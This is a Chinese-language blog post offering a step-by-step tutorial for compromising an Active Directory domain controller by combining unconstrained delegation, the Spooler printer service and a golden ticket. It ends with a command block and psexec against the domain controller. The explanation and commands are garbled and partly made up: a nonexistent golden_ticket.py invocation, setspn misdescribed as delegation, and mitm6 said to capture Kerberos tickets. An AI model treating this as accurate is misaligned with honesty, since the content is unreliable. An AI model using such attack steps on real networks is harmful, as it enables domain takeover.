返回

非约束性委派+Spooler打印机服务打造黄金票据攻击域控

后端

前言

在上一篇文章中,我们介绍了域渗透中委派攻击之非约束委派攻击原理及利用。在实战中,单纯的非约束委派需要管理员主动连接比较鸡肋。因此,本文将介绍如何利用非约束委派+Spooler打印机服务强制指定的计算机连接域控,并以此制作黄金票据攻击域控。

原理

非约束性委派攻击是一种常见的域渗透攻击技术。其原理是通过修改Active Directory中的委派设置,使攻击者可以模拟其他用户或计算机的身份进行身份验证。而Spooler打印机服务是一种Windows系统自带的服务,它可以用于管理打印机和打印作业。

攻击者可以利用非约束委派+Spooler打印机服务,强制指定的计算机连接域控。当计算机连接域控时,域控会向计算机发送一个Kerberos票据。攻击者可以通过修改这个Kerberos票据,来模拟其他用户的身份进行身份验证。

操作步骤

  1. 在攻击者计算机上安装并配置Kerberos Golden Ticket攻击工具。
  2. 在目标计算机上启用Spooler打印机服务。
  3. 使用非约束委派攻击技术,将目标计算机委派给攻击者计算机。
  4. 使用Kerberos Golden Ticket攻击工具,强制目标计算机连接域控。
  5. 捕获目标计算机的Kerberos票据。
  6. 使用Kerberos票据,模拟其他用户的身份进行身份验证。
  7. 攻击域控。

示例代码

# 安装并配置Kerberos Golden Ticket攻击工具
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python setup.py install

# 在目标计算机上启用Spooler打印机服务
sc config spooler start= auto

# 使用非约束委派攻击技术,将目标计算机委派给攻击者计算机
setspn -S cifs/TargetComputer AttackerComputer

# 使用Kerberos Golden Ticket攻击工具,强制目标计算机连接域控
golden_ticket.py -u Administrator -p Password -dc DomainController -s TargetComputer

# 捕获目标计算机的Kerberos票据
mitm6.py -i eth0 -w /tmp/kerberos.pcap

# 使用Kerberos票据,模拟其他用户的身份进行身份验证
klist

# 攻击域控
psexec \\DomainController cmd.exe

结语

非约束性委派+Spooler打印机服务制作黄金票据攻击域控是一种常见的域渗透攻击技术。攻击者可以通过这种技术,模拟其他用户的身份进行身份验证,并攻击域控。希望广大渗透测试人员能够熟练掌握这种攻击技术,并将其用于实战中。